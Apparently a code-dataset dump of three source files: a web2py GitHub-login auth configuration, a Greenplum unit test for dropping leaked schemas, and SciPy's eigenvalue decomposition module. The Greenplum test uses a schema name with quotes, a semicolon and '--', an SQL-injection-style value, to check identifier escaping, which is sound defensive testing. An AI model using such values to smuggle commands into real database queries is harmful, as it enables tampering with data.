avatar_url = user_json['avatar_url'],
github_auth_token = access_token,
# adding more (apparently) standard web2py fields, to make this work..
first_name = user_json['login'],
last_name = ("(%s)" % user_json.get('name', user_json['login'])),
username = user_json['login'],
#password = 'TOP-SECRET',
registration_key = user_json['login'],
)
##pprint(auth_user_fields)
##pprint('--------------------------------')
return dict(auth_user_fields)
# use the class above to build a new login form
auth.settings.login_form=GitHubAccount()
# specify which auth_user fields can be modified on SECOND and subsequent logins
auth.settings.update_fields = ['name',
'email',
'github_login',
#'registration_id',
'github_url',
'avatar_url',
'github_auth_token',
'first_name',
'last_name',
'username',
#'password',
'registration_key']
# there's no point in offer other user-management actions (we just shadow users in GitHub)
auth.settings.actions_disabled=['register', 'change_password','request_reset_password','profile']
## configure email
mail = auth.settings.mailer
mail.settings.server = 'logging' or 'smtp.gmail.com:587'
mail.settings.sender = '[email protected]'
mail.settings.login = 'username:password'
## configure auth policy
auth.settings.registration_requires_verification = False
auth.settings.registration_requires_approval = False
auth.settings.reset_password_requires_verification = True
#########################################################################
## Define your tables below (or better in another model file) for example
##
## >>> db.define_table('mytable',Field('myfield','string'))
##
## Fields can be 'string','text','password','integer','double','boolean'
## 'date','time','datetime','blob','upload', 'reference TABLENAME'
## There is an implicit 'id integer autoincrement' field
## Consult manual for more options, validators, etc.
##
## More API examples for controllers:
##
## >>> db.mytable.insert(myfield='value')
## >>> rows=db(db.mytable.myfield=='value').select(db.mytable.ALL)
## >>> for row in rows: print row.id, row.myfield
#########################################################################
## after defining tables, uncomment below to enable auditing
# auth.enable_record_versioning(db)
| apache-2.0 |
ahachete/gpdb | gpMgmt/bin/gppylib/test/unit/test_unit_leaked_schema_dropper.py | 39 | 2184 | from mock import *
from gp_unittest import *
from gpcheckcat_modules.leaked_schema_dropper import LeakedSchemaDropper
class LeakedSchemaDropperTestCase(GpTestCase):
def setUp(self):
self.db_connection = Mock(spec=['query'])
two_leaked_schemas = Mock()
two_leaked_schemas.getresult.return_value = [
('fake_leak_1', 'something_else'),
('some"test"special_#;character--schema', 'something_else')
]
self.db_connection.query.return_value = two_leaked_schemas
self.subject = LeakedSchemaDropper()
def test_drop_leaked_schemas__returns_a_list_of_leaked_schemas(self):
self.assertEqual(self.subject.drop_leaked_schemas(self.db_connection), ['fake_leak_1', 'some"test"special_#;character--schema'])
def test_drop_leaked_schemas__when_there_are_no_leaked_schemas__returns_an_empty_list(self):
no_leaked_schemas = Mock()
no_leaked_schemas.getresult.return_value = []
self.db_connection.query.return_value = no_leaked_schemas
self.assertEqual(self.subject.drop_leaked_schemas(self.db_connection), [])
def test_drop_leaked_schemas__when_query_returns_null_schema__returns_an_empty_list(self):
null_leaked_schema = Mock()
null_leaked_schema.getresult.return_value = [(None, 'something_else')]
self.db_connection.query.return_value = null_leaked_schema
self.assertEqual(self.subject.drop_leaked_schemas(self.db_connection), [])
def test_drop_leaked_schemas__when_query_returns_null__returns_an_empty_list(self):
self.db_connection.query.return_value = None
self.assertEqual(self.subject.drop_leaked_schemas(self.db_connection), [])
def test_drop_leaked_schemas__drops_orphaned_and_leaked_schemas(self):
self.subject.drop_leaked_schemas(self.db_connection)
drop_query_expected_list = [call("DROP SCHEMA IF EXISTS \"fake_leak_1\" CASCADE;"),
call("DROP SCHEMA IF EXISTS \"some\"\"test\"\"special_#;character--schema\" CASCADE;")]
self.db_connection.query.assert_has_calls(drop_query_expected_list)
if __name__ == '__main__':
run_tests()
| apache-2.0 |
ryfeus/lambda-packs | LightGBM_sklearn_scipy_numpy/source/scipy/linalg/decomp.py | 9 | 43423 | #
# Author: Pearu Peterson, March 2002
#
# additions by Travis Oliphant, March 2002
# additions by Eric Jones, June 2002
# additions by Johannes Loehnert, June 2006
# additions by Bart Vandereycken, June 2006
# additions by Andrew D Straw, May 2007
# additions by Tiziano Zito, November 2008
#
# April 2010: Functions for LU, QR, SVD, Schur and Cholesky decompositions were
# moved to their own files. Still in this file are functions for eigenstuff
# and for the Hessenberg form.
from __future__ import division, print_function, absolute_import
__all__ = ['eig', 'eigvals', 'eigh', 'eigvalsh',
'eig_banded', 'eigvals_banded',
'eigh_tridiagonal', 'eigvalsh_tridiagonal', 'hessenberg']
import numpy
from numpy import (array, isfinite, inexact, nonzero, iscomplexobj, cast,
flatnonzero, conj, asarray, argsort, empty)
# Local imports
from scipy._lib.six import xrange
from scipy._lib._util import _asarray_validated
from scipy._lib.six import string_types
from .misc import LinAlgError, _datacopied, norm
from .lapack import get_lapack_funcs, _compute_lwork
_I = cast['F'](1j)
def _make_complex_eigvecs(w, vin, dtype):
"""
Produce complex-valued eigenvectors from LAPACK DGGEV real-valued output
"""
# - see LAPACK man page DGGEV at ALPHAI
v = numpy.array(vin, dtype=dtype)
m = (w.imag > 0)
m[:-1] |= (w.imag[1:] < 0) # workaround for LAPACK bug, cf. ticket #709
for i in flatnonzero(m):
v.imag[:, i] = vin[:, i+1]
conj(v[:, i], v[:, i+1])
return v
def _make_eigvals(alpha, beta, homogeneous_eigvals):
if homogeneous_eigvals:
if beta is None:
return numpy.vstack((alpha, numpy.ones_like(alpha)))
else:
return numpy.vstack((alpha, beta))
else:
if beta is None:
return alpha
else:
w = numpy.empty_like(alpha)
alpha_zero = (alpha == 0)
beta_zero = (beta == 0)
beta_nonzero = ~beta_zero
w[beta_nonzero] = alpha[beta_nonzero]/beta[beta_nonzero]
# Use numpy.inf for complex values too since
# 1/numpy.inf = 0, i.e. it correctly behaves as projective
# infinity.
w[~alpha_zero & beta_zero] = numpy.inf
if numpy.all(alpha.imag == 0):
w[alpha_zero & beta_zero] = numpy.nan
else:
w[alpha_zero & beta_zero] = complex(numpy.nan, numpy.nan)
return w
def _geneig(a1, b1, left, right, overwrite_a, overwrite_b,
homogeneous_eigvals):
ggev, = get_lapack_funcs(('ggev',), (a1, b1))
cvl, cvr = left, right
res = ggev(a1, b1, lwork=-1)
lwork = res[-2][0].real.astype(numpy.int)
if ggev.typecode in 'cz':
alpha, beta, vl, vr, work, info = ggev(a1, b1, cvl, cvr, lwork,
overwrite_a, overwrite_b)
w = _make_eigvals(alpha, beta, homogeneous_eigvals)
else:
alphar, alphai, beta, vl, vr, work, info = ggev(a1, b1, cvl, cvr,
lwork, overwrite_a,
overwrite_b)
alpha = alphar + _I * alphai
w = _make_eigvals(alpha, beta, homogeneous_eigvals)
_check_info(info, 'generalized eig algorithm (ggev)')
only_real = numpy.all(w.imag == 0.0)
if not (ggev.typecode in 'cz' or only_real):
t = w.dtype.char
if left:
vl = _make_complex_eigvecs(w, vl, t)
if right:
vr = _make_complex_eigvecs(w, vr, t)
# the eigenvectors returned by the lapack function are NOT normalized
for i in xrange(vr.shape[0]):
if right:
vr[:, i] /= norm(vr[:, i])
if left:
vl[:, i] /= norm(vl[:, i])
if not (left or right):
return w
if left:
if right:
return w, vl, vr
return w, vl
return w, vr
def eig(a, b=None, left=False, right=True, overwrite_a=False,
overwrite_b=False, check_finite=True, homogeneous_eigvals=False):
"""
Solve an ordinary or generalized eigenvalue problem of a square matrix.
Find eigenvalues w and right or left eigenvectors of a general matrix::
a vr[:,i] = w[i] b vr[:,i]
a.H vl[:,i] = w[i].conj() b.H vl[:,i]
where ``.H`` is the Hermitian conjugation.
Parameters
----------
a : (M, M) array_like
A complex or real matrix whose eigenvalues and eigenvectors
will be computed.
b : (M, M) array_like, optional
Right-hand side matrix in a generalized eigenvalue problem.
Default is None, identity matrix is assumed.
left : bool, optional
Whether to calculate and return left eigenvectors. Default is False.
right : bool, optional
Whether to calculate and return right eigenvectors. Default is True.
overwrite_a : bool, optional
Whether to overwrite `a`; may improve performance. Default is False.
overwrite_b : bool, optional
Whether to overwrite `b`; may improve performance. Default is False.
check_finite : bool, optional
Whether to check that the input matrices contain only finite numbers.
Disabling may give a performance gain, but may result in problems
(crashes, non-termination) if the inputs do contain infinities or NaNs.
homogeneous_eigvals : bool, optional
If True, return the eigenvalues in homogeneous coordinates.
In this case ``w`` is a (2, M) array so that::
w[1,i] a vr[:,i] = w[0,i] b vr[:,i]
Default is False.
Returns
-------
w : (M,) or (2, M) double or complex ndarray
The eigenvalues, each repeated according to its
multiplicity. The shape is (M,) unless
``homogeneous_eigvals=True``.
vl : (M, M) double or complex ndarray
The normalized left eigenvector corresponding to the eigenvalue
``w[i]`` is the column vl[:,i]. Only returned if ``left=True``.
vr : (M, M) double or complex ndarray
The normalized right eigenvector corresponding to the eigenvalue
``w[i]`` is the column ``vr[:,i]``. Only returned if ``right=True``.
Raises
------
LinAlgError
If eigenvalue computation does not converge.
See Also
--------
eigvals : eigenvalues of general arrays
eigh : Eigenvalues and right eigenvectors for symmetric/Hermitian arrays.
eig_banded : eigenvalues and right eigenvectors for symmetric/Hermitian
band matrices
eigh_tridiagonal : eigenvalues and right eiegenvectors for
symmetric/Hermitian tridiagonal matrices
"""
a1 = _asarray_validated(a, check_finite=check_finite)
if len(a1.shape) != 2 or a1.shape[0] != a1.shape[1]:
raise ValueError('expected square matrix')
overwrite_a = overwrite_a or (_datacopied(a1, a))
if b is not None:
b1 = _asarray_validated(b, check_finite=check_finite)
overwrite_b = overwrite_b or _datacopied(b1, b)
if len(b1.shape) != 2 or b1.shape[0] != b1.shape[1]:
raise ValueError('expected square matrix')
if b1.shape != a1.shape:
raise ValueError('a and b must have the same shape')
return _geneig(a1, b1, left, right, overwrite_a, overwrite_b,
homogeneous_eigvals)
geev, geev_lwork = get_lapack_funcs(('geev', 'geev_lwork'), (a1,))
compute_vl, compute_vr = left, right
lwork = _compute_lwork(geev_lwork, a1.shape[0],
compute_vl=compute_vl,
compute_vr=compute_vr)
if geev.typecode in 'cz':
w, vl, vr, info = geev(a1, lwork=lwork,
compute_vl=compute_vl,
compute_vr=compute_vr,
overwrite_a=overwrite_a)
w = _make_eigvals(w, None, homogeneous_eigvals)
else:
wr, wi, vl, vr, info = geev(a1, lwork=lwork,
compute_vl=compute_vl,
compute_vr=compute_vr,
overwrite_a=overwrite_a)
t = {'f': 'F', 'd': 'D'}[wr.dtype.char]
w = wr + _I * wi
w = _make_eigvals(w, None, homogeneous_eigvals)
_check_info(info, 'eig algorithm (geev)',
positive='did not converge (only eigenvalues '
'with order >= %d have converged)')
only_real = numpy.all(w.imag == 0.0)
if not (geev.typecode in 'cz' or only_real):
t = w.dtype.char
if left:
vl = _make_complex_eigvecs(w, vl, t)
if right:
vr = _make_complex_eigvecs(w, vr, t)
if not (left or right):
return w
if left:
if right:
return w, vl, vr
return w, vl
return w, vr
def eigh(a, b=None, lower=True, eigvals_only=False, overwrite_a=False,
overwrite_b=False, turbo=True, eigvals=None, type=1,
check_finite=True):
"""
Solve an ordinary or generalized eigenvalue problem for a complex
Hermitian or real symmetric matrix.
Find eigenvalues w and optionally eigenvectors v of matrix `a`, where
`b` is positive definite::
a v[:,i] = w[i] b v[:,i]
v[i,:].conj() a v[:,i] = w[i]
v[i,:].conj() b v[:,i] = 1
Parameters
----------
a : (M, M) array_like
A complex Hermitian or real symmetric matrix whose eigenvalues and
eigenvectors will be computed.
b : (M, M) array_like, optional
A complex Hermitian or real symmetric definite positive matrix in.
If omitted, identity matrix is assumed.
lower : bool, optional
Whether the pertinent array data is taken from the lower or upper
triangle of `a`. (Default: lower)
eigvals_only : bool, optional
Whether to calculate only eigenvalues and no eigenvectors.
(Default: both are calculated)
turbo : bool, optional
Use divide and conquer algorithm (faster but expensive in memory,
only for generalized eigenvalue problem and if eigvals=None)
eigvals : tuple (lo, hi), optional
Indexes of the smallest and largest (in ascending order) eigenvalues
and corresponding eigenvectors to be returned: 0 <= lo <= hi <= M-1.
If omitted, all eigenvalues and eigenvectors are returned.
type : int, optional
Specifies the problem type to be solved:
type = 1: a v[:,i] = w[i] b v[:,i]
type = 2: a b v[:,i] = w[i] v[:,i]
type = 3: b a v[:,i] = w[i] v[:,i]
overwrite_a : bool, optional
Whether to overwrite data in `a` (may improve performance)
overwrite_b : bool, optional
Whether to overwrite data in `b` (may improve performance)
check_finite : bool, optional
Whether to check that the input matrices contain only finite numbers.
Disabling may give a performance gain, but may result in problems
(crashes, non-termination) if the inputs do contain infinities or NaNs.
Returns
-------
w : (N,) float ndarray
The N (1<=N<=M) selected eigenvalues, in ascending order, each
repeated according to its multiplicity.
v : (M, N) complex ndarray
(if eigvals_only == False)
The normalized selected eigenvector corresponding to the
eigenvalue w[i] is the column v[:,i].
Normalization:
type 1 and 3: v.conj() a v = w
type 2: inv(v).conj() a inv(v) = w
type = 1 or 2: v.conj() b v = I
type = 3: v.conj() inv(b) v = I
Raises
------
LinAlgError
If eigenvalue computation does not converge,
an error occurred, or b matrix is not definite positive. Note that
if input matrices are not symmetric or hermitian, no error is reported
but results will be wrong.
See Also
--------
eigvalsh : eigenvalues of symmetric or Hermitian arrays
eig : eigenvalues and right eigenvectors for non-symmetric arrays
eigh : eigenvalues and right eigenvectors for symmetric/Hermitian arrays
eigh_tridiagonal : eigenvalues and right eiegenvectors for
symmetric/Hermitian tridiagonal matrices
"""
a1 = _asarray_validated(a, check_finite=check_finite)
if len(a1.shape) != 2 or a1.shape[0] != a1.shape[1]:
raise ValueError('expected square matrix')
overwrite_a = overwrite_a or (_datacopied(a1, a))
if iscomplexobj(a1):
cplx = True
else:
cplx = False
if b is not None:
b1 = _asarray_validated(b, check_finite=check_finite)
overwrite_b = overwrite_b or _datacopied(b1, b)
if len(b1.shape) != 2 or b1.shape[0] != b1.shape[1]:
raise ValueError('expected square matrix')
if b1.shape != a1.shape:
raise ValueError("wrong b dimensions %s, should "
"be %s" % (str(b1.shape), str(a1.shape)))
if iscomplexobj(b1):
cplx = True
else:
cplx = cplx or False
else:
b1 = None
# Set job for fortran routines
_job = (eigvals_only and 'N') or 'V'
# port eigenvalue range from python to fortran convention
if eigvals is not None:
lo, hi = eigvals
if lo < 0 or hi >= a1.shape[0]:
raise ValueError('The eigenvalue range specified is not valid.\n'
'Valid range is [%s,%s]' % (0, a1.shape[0]-1))
lo += 1
hi += 1
eigvals = (lo, hi)
# set lower
if lower:
uplo = 'L'
else:
uplo = 'U'
# fix prefix for lapack routines
if cplx:
pfx = 'he'
else:
pfx = 'sy'
# Standard Eigenvalue Problem
# Use '*evr' routines
# FIXME: implement calculation of optimal lwork
# for all lapack routines
if b1 is None:
driver = pfx+'evr'
(evr,) = get_lapack_funcs((driver,), (a1,))
if eigvals is None:
w, v, info = evr(a1, uplo=uplo, jobz=_job, range="A", il=1,
iu=a1.shape[0], overwrite_a=overwrite_a)
else:
(lo, hi) = eigvals
w_tot, v, info = evr(a1, uplo=uplo, jobz=_job, range="I",
il=lo, iu=hi, overwrite_a=overwrite_a)
w = w_tot[0:hi-lo+1]
# Generalized Eigenvalue Problem
else:
# Use '*gvx' routines if range is specified
if eigvals is not None:
driver = pfx+'gvx'
(gvx,) = get_lapack_funcs((driver,), (a1, b1))
(lo, hi) = eigvals
w_tot, v, ifail, info = gvx(a1, b1, uplo=uplo, iu=hi,
itype=type, jobz=_job, il=lo,
overwrite_a=overwrite_a,
overwrite_b=overwrite_b)
w = w_tot[0:hi-lo+1]
# Use '*gvd' routine if turbo is on and no eigvals are specified
elif turbo:
driver = pfx+'gvd'
(gvd,) = get_lapack_funcs((driver,), (a1, b1))
v, w, info = gvd(a1, b1, uplo=uplo, itype=type, jobz=_job,
overwrite_a=overwrite_a,
overwrite_b=overwrite_b)
# Use '*gv' routine if turbo is off and no eigvals are specified
else:
driver = pfx+'gv'
(gv,) = get_lapack_funcs((driver,), (a1, b1))
v, w, info = gv(a1, b1, uplo=uplo, itype=type, jobz=_job,
overwrite_a=overwrite_a,
overwrite_b=overwrite_b)
# Check if we had a successful exit
if info == 0:
if eigvals_only:
return w
else:
return w, v
_check_info(info, driver, positive=False) # triage more specifically
if info > 0 and b1 is None:
raise LinAlgError("unrecoverable internal error.")
# The algorithm failed to converge.
elif 0 < info <= b1.shape[0]:
if eigvals is not None:
raise LinAlgError("the eigenvectors %s failed to"
" converge." % nonzero(ifail)-1)
else:
raise LinAlgError("internal fortran routine failed to converge: "
"%i off-diagonal elements of an "
"intermediate tridiagonal form did not converge"
" to zero." % info)
# This occurs when b is not positive definite
else:
raise LinAlgError("the leading minor of order %i"
" of 'b' is not positive definite. The"
" factorization of 'b' could not be completed"
" and no eigenvalues or eigenvectors were"
" computed." % (info-b1.shape[0]))
_conv_dict = {0: 0, 1: 1, 2: 2,
'all': 0, 'value': 1, 'index': 2,
'a': 0, 'v': 1, 'i': 2}
def _check_select(select, select_range, max_ev, max_len):
"""Check that select is valid, convert to Fortran style."""
if isinstance(select, string_types):
select = select.lower()
try:
select = _conv_dict[select]
except KeyError:
raise ValueError('invalid argument for select')
vl, vu = 0., 1.
il = iu = 1
if select != 0: # (non-all)
sr = asarray(select_range)
if sr.ndim != 1 or sr.size != 2 or sr[1] < sr[0]:
raise ValueError('select_range must be a 2-element array-like '
'in nondecreasing order')
if select == 1: # (value)
vl, vu = sr
if max_ev == 0:
max_ev = max_len
else: # 2 (index)
if sr.dtype.char.lower() not in 'lih':
raise ValueError('when using select="i", select_range must '
'contain integers, got dtype %s' % sr.dtype)
# translate Python (0 ... N-1) into Fortran (1 ... N) with + 1
il, iu = sr + 1
if min(il, iu) < 1 or max(il, iu) > max_len:
raise ValueError('select_range out of bounds')
max_ev = iu - il + 1
return select, vl, vu, il, iu, max_ev
def eig_banded(a_band, lower=False, eigvals_only=False, overwrite_a_band=False,
select='a', select_range=None, max_ev=0, check_finite=True):
"""
Solve real symmetric or complex hermitian band matrix eigenvalue problem.
Find eigenvalues w and optionally right eigenvectors v of a::
a v[:,i] = w[i] v[:,i]
v.H v = identity
The matrix a is stored in a_band either in lower diagonal or upper
diagonal ordered form:
a_band[u + i - j, j] == a[i,j] (if upper form; i <= j)
a_band[ i - j, j] == a[i,j] (if lower form; i >= j)
where u is the number of bands above the diagonal.
Example of a_band (shape of a is (6,6), u=2)::
upper form:
* * a02 a13 a24 a35
* a01 a12 a23 a34 a45
a00 a11 a22 a33 a44 a55
lower form:
a00 a11 a22 a33 a44 a55
a10 a21 a32 a43 a54 *
a20 a31 a42 a53 * *
Cells marked with * are not used.
Parameters
----------
a_band : (u+1, M) array_like
The bands of the M by M matrix a.
lower : bool, optional
Is the matrix in the lower form. (Default is upper form)
eigvals_only : bool, optional
Compute only the eigenvalues and no eigenvectors.
(Default: calculate also eigenvectors)
overwrite_a_band : bool, optional
Discard data in a_band (may enhance performance)
select : {'a', 'v', 'i'}, optional
Which eigenvalues to calculate
====== ========================================
select calculated
====== ========================================
'a' All eigenvalues
'v' Eigenvalues in the interval (min, max]
'i' Eigenvalues with indices min <= i <= max
====== ========================================
select_range : (min, max), optional
Range of selected eigenvalues
max_ev : int, optional
For select=='v', maximum number of eigenvalues expected.
For other values of select, has no meaning.
In doubt, leave this parameter untouched.
check_finite : bool, optional
Whether to check that the input matrix contains only finite numbers.
Disabling may give a performance gain, but may result in problems
(crashes, non-termination) if the inputs do contain infinities or NaNs.
Returns
-------
w : (M,) ndarray
The eigenvalues, in ascending order, each repeated according to its
multiplicity.
v : (M, M) float or complex ndarray
The normalized eigenvector corresponding to the eigenvalue w[i] is
the column v[:,i].
Raises
------
LinAlgError
If eigenvalue computation does not converge.
See Also
--------
eigvals_banded : eigenvalues for symmetric/Hermitian band matrices
eig : eigenvalues and right eigenvectors of general arrays.
eigh : eigenvalues and right eigenvectors for symmetric/Hermitian arrays
eigh_tridiagonal : eigenvalues and right eiegenvectors for
symmetric/Hermitian tridiagonal matrices
"""
if eigvals_only or overwrite_a_band:
a1 = _asarray_validated(a_band, check_finite=check_finite)
overwrite_a_band = overwrite_a_band or (_datacopied(a1, a_band))
else:
a1 = array(a_band)
if issubclass(a1.dtype.type, inexact) and not isfinite(a1).all():
raise ValueError("array must not contain infs or NaNs")
overwrite_a_band = 1
if len(a1.shape) != 2:
raise ValueError('expected two-dimensional array')
select, vl, vu, il, iu, max_ev = _check_select(
select, select_range, max_ev, a1.shape[1])
del select_range
if select == 0:
if a1.dtype.char in 'GFD':
# FIXME: implement this somewhen, for now go with builtin values
# FIXME: calc optimal lwork by calling ?hbevd(lwork=-1)
# or by using calc_lwork.f ???
# lwork = calc_lwork.hbevd(bevd.typecode, a1.shape[0], lower)
internal_name = 'hbevd'
else: # a1.dtype.char in 'fd':
# FIXME: implement this somewhen, for now go with builtin values
# see above
# lwork = calc_lwork.sbevd(bevd.typecode, a1.shape[0], lower)
internal_name = 'sbevd'
bevd, = get_lapack_funcs((internal_name,), (a1,))
w, v, info = bevd(a1, compute_v=not eigvals_only,
lower=lower, overwrite_ab=overwrite_a_band)
else: # select in [1, 2]
if eigvals_only:
max_ev = 1
# calculate optimal abstol for dsbevx (see manpage)
if a1.dtype.char in 'fF': # single precision
lamch, = get_lapack_funcs(('lamch',), (array(0, dtype='f'),))
else:
lamch, = get_lapack_funcs(('lamch',), (array(0, dtype='d'),))
abstol = 2 * lamch('s')
if a1.dtype.char in 'GFD':
internal_name = 'hbevx'
else: # a1.dtype.char in 'gfd'
internal_name = 'sbevx'
bevx, = get_lapack_funcs((internal_name,), (a1,))
w, v, m, ifail, info = bevx(
a1, vl, vu, il, iu, compute_v=not eigvals_only, mmax=max_ev,
range=select, lower=lower, overwrite_ab=overwrite_a_band,
abstol=abstol)
# crop off w and v
w = w[:m]
if not eigvals_only:
v = v[:, :m]
_check_info(info, internal_name)
if eigvals_only:
return w
return w, v
def eigvals(a, b=None, overwrite_a=False, check_finite=True,
homogeneous_eigvals=False):
"""
Compute eigenvalues from an ordinary or generalized eigenvalue problem.
Find eigenvalues of a general matrix::
a vr[:,i] = w[i] b vr[:,i]
Parameters
----------
a : (M, M) array_like
A complex or real matrix whose eigenvalues and eigenvectors
will be computed.
b : (M, M) array_like, optional
Right-hand side matrix in a generalized eigenvalue problem.
If omitted, identity matrix is assumed.
overwrite_a : bool, optional
Whether to overwrite data in a (may improve performance)
check_finite : bool, optional
Whether to check that the input matrices contain only finite numbers.
Disabling may give a performance gain, but may result in problems
(crashes, non-termination) if the inputs do contain infinities
or NaNs.
homogeneous_eigvals : bool, optional
If True, return the eigenvalues in homogeneous coordinates.
In this case ``w`` is a (2, M) array so that::
w[1,i] a vr[:,i] = w[0,i] b vr[:,i]
Default is False.
Returns
-------
w : (M,) or (2, M) double or complex ndarray
The eigenvalues, each repeated according to its multiplicity
but not in any specific order. The shape is (M,) unless
``homogeneous_eigvals=True``.
Raises
------
LinAlgError
If eigenvalue computation does not converge
See Also
--------
eig : eigenvalues and right eigenvectors of general arrays.
eigvalsh : eigenvalues of symmetric or Hermitian arrays
eigvals_banded : eigenvalues for symmetric/Hermitian band matrices
eigvalsh_tridiagonal : eigenvalues of symmetric/Hermitian tridiagonal
matrices
"""
return eig(a, b=b, left=0, right=0, overwrite_a=overwrite_a,
check_finite=check_finite,
homogeneous_eigvals=homogeneous_eigvals)
def eigvalsh(a, b=None, lower=True, overwrite_a=False,
overwrite_b=False, turbo=True, eigvals=None, type=1,
check_finite=True):
"""
Solve an ordinary or generalized eigenvalue problem for a complex
Hermitian or real symmetric matrix.
Find eigenvalues w of matrix a, where b is positive definite::
a v[:,i] = w[i] b v[:,i]
v[i,:].conj() a v[:,i] = w[i]
v[i,:].conj() b v[:,i] = 1
Parameters
----------
a : (M, M) array_like
A complex Hermitian or real symmetric matrix whose eigenvalues and
eigenvectors will be computed.
b : (M, M) array_like, optional
A complex Hermitian or real symmetric definite positive matrix in.
If omitted, identity matrix is assumed.
lower : bool, optional
Whether the pertinent array data is taken from the lower or upper
triangle of `a`. (Default: lower)
turbo : bool, optional
Use divide and conquer algorithm (faster but expensive in memory,
only for generalized eigenvalue problem and if eigvals=None)
eigvals : tuple (lo, hi), optional
Indexes of the smallest and largest (in ascending order) eigenvalues
and corresponding eigenvectors to be returned: 0 <= lo < hi <= M-1.
If omitted, all eigenvalues and eigenvectors are returned.
type : int, optional
Specifies the problem type to be solved:
type = 1: a v[:,i] = w[i] b v[:,i]
type = 2: a b v[:,i] = w[i] v[:,i]
type = 3: b a v[:,i] = w[i] v[:,i]
overwrite_a : bool, optional
Whether to overwrite data in `a` (may improve performance)
overwrite_b : bool, optional
Whether to overwrite data in `b` (may improve performance)
check_finite : bool, optional
Whether to check that the input matrices contain only finite numbers.
Disabling may give a performance gain, but may result in problems
(crashes, non-termination) if the inputs do contain infinities or NaNs.
Returns
-------
w : (N,) float ndarray
The N (1<=N<=M) selected eigenvalues, in ascending order, each
repeated according to its multiplicity.
Raises
------
LinAlgError
If eigenvalue computation does not converge,
an error occurred, or b matrix is not definite positive. Note that
if input matrices are not symmetric or hermitian, no error is reported
but results will be wrong.
See Also
--------
eigh : eigenvalues and right eigenvectors for symmetric/Hermitian arrays
eigvals : eigenvalues of general arrays
eigvals_banded : eigenvalues for symmetric/Hermitian band matrices
eigvalsh_tridiagonal : eigenvalues of symmetric/Hermitian tridiagonal
matrices
"""
return eigh(a, b=b, lower=lower, eigvals_only=True,
overwrite_a=overwrite_a, overwrite_b=overwrite_b,
turbo=turbo, eigvals=eigvals, type=type,
check_finite=check_finite)
def eigvals_banded(a_band, lower=False, overwrite_a_band=False,
select='a', select_range=None, check_finite=True):
"""
Solve real symmetric or complex hermitian band matrix eigenvalue problem.
Find eigenvalues w of a::
a v[:,i] = w[i] v[:,i]
v.H v = identity
The matrix a is stored in a_band either in lower diagonal or upper
diagonal ordered form:
a_band[u + i - j, j] == a[i,j] (if upper form; i <= j)
a_band[ i - j, j] == a[i,j] (if lower form; i >= j)
where u is the number of bands above the diagonal.
Example of a_band (shape of a is (6,6), u=2)::
upper form:
* * a02 a13 a24 a35
* a01 a12 a23 a34 a45
a00 a11 a22 a33 a44 a55
lower form:
a00 a11 a22 a33 a44 a55
a10 a21 a32 a43 a54 *
a20 a31 a42 a53 * *
Cells marked with * are not used.
Parameters
----------
a_band : (u+1, M) array_like
The bands of the M by M matrix a.
lower : bool, optional
Is the matrix in the lower form. (Default is upper form)
overwrite_a_band : bool, optional
Discard data in a_band (may enhance performance)
select : {'a', 'v', 'i'}, optional
Which eigenvalues to calculate
====== ========================================
select calculated
====== ========================================
'a' All eigenvalues
'v' Eigenvalues in the interval (min, max]
'i' Eigenvalues with indices min <= i <= max
====== ========================================
select_range : (min, max), optional
Range of selected eigenvalues
check_finite : bool, optional
Whether to check that the input matrix contains only finite numbers.
Disabling may give a performance gain, but may result in problems
(crashes, non-termination) if the inputs do contain infinities or NaNs.
Returns
-------
w : (M,) ndarray
The eigenvalues, in ascending order, each repeated according to its
multiplicity.
Raises
------
LinAlgError
If eigenvalue computation does not converge.
See Also
--------
eig_banded : eigenvalues and right eigenvectors for symmetric/Hermitian
band matrices
eigvalsh_tridiagonal : eigenvalues of symmetric/Hermitian tridiagonal
matrices
eigvals : eigenvalues of general arrays
eigh : eigenvalues and right eigenvectors for symmetric/Hermitian arrays
eig : eigenvalues and right eigenvectors for non-symmetric arrays
"""
return eig_banded(a_band, lower=lower, eigvals_only=1,
overwrite_a_band=overwrite_a_band, select=select,
select_range=select_range, check_finite=check_finite)
def eigvalsh_tridiagonal(d, e, select='a', select_range=None,
check_finite=True, tol=0., lapack_driver='auto'):
"""
Solve eigenvalue problem for a real symmetric tridiagonal matrix.
Find eigenvalues `w` of ``a``::
a v[:,i] = w[i] v[:,i]
v.H v = identity
For a real symmetric matrix ``a`` with diagonal elements `d` and
off-diagonal elements `e`.
Parameters
----------
d : ndarray, shape (ndim,)
The diagonal elements of the array.
e : ndarray, shape (ndim-1,)
The off-diagonal elements of the array.
select : {'a', 'v', 'i'}, optional
Which eigenvalues to calculate
====== ========================================
select calculated
====== ========================================
'a' All eigenvalues
'v' Eigenvalues in the interval (min, max]
'i' Eigenvalues with indices min <= i <= max
====== ========================================
select_range : (min, max), optional
Range of selected eigenvalues
check_finite : bool, optional
Whether to check that the input matrix contains only finite numbers.
Disabling may give a performance gain, but may result in problems
(crashes, non-termination) if the inputs do contain infinities or NaNs.
tol : float
The absolute tolerance to which each eigenvalue is required
(only used when ``lapack_driver='stebz'``).
An eigenvalue (or cluster) is considered to have converged if it
lies in an interval of this width. If <= 0. (default),
the value ``eps*|a|`` is used where eps is the machine precision,
and ``|a|`` is the 1-norm of the matrix ``a``.
lapack_driver : str
LAPACK function to use, can be 'auto', 'stemr', 'stebz', 'sterf',
or 'stev'. When 'auto' (default), it will use 'stemr' if ``select='a'``
and 'stebz' otherwise. 'sterf' and 'stev' can only be used when
``select='a'``.
Returns
-------
w : (M,) ndarray
The eigenvalues, in ascending order, each repeated according to its
multiplicity.
Raises
------
LinAlgError
If eigenvalue computation does not converge.
See Also
--------
eigh_tridiagonal : eigenvalues and right eiegenvectors for
symmetric/Hermitian tridiagonal matrices
"""
return eigh_tridiagonal(
d, e, eigvals_only=True, select=select, select_range=select_range,
check_finite=check_finite, tol=tol, lapack_driver=lapack_driver)
def eigh_tridiagonal(d, e, eigvals_only=False, select='a', select_range=None,
check_finite=True, tol=0., lapack_driver='auto'):
"""
Solve eigenvalue problem for a real symmetric tridiagonal matrix.
Find eigenvalues `w` and optionally right eigenvectors `v` of ``a``::
a v[:,i] = w[i] v[:,i]
v.H v = identity
For a real symmetric matrix ``a`` with diagonal elements `d` and
off-diagonal elements `e`.
Parameters
----------
d : ndarray, shape (ndim,)
The diagonal elements of the array.
e : ndarray, shape (ndim-1,)
The off-diagonal elements of the array.
select : {'a', 'v', 'i'}, optional
Which eigenvalues to calculate
====== ========================================
select calculated
====== ========================================
'a' All eigenvalues
'v' Eigenvalues in the interval (min, max]
'i' Eigenvalues with indices min <= i <= max
====== ========================================
select_range : (min, max), optional
Range of selected eigenvalues
check_finite : bool, optional
Whether to check that the input matrix contains only finite numbers.
